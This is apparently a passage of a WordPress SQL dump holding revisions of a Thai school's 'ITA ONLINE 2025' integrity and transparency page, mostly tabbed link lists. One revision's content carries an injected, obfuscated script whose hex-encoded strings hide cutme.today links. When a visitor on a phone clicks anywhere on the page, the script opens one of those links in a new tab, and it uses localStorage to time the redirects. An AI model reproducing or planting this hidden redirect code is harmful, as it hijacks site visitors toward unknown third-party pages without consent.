kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-02 10:40:21','2025-07-02 03:40:21','',871,'http://pakhaeng.ssk.in.th/?p=1598',0,'revision','',0),
(1599,1,'2025-07-02 10:40:32','2025-07-02 03:40:32','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"te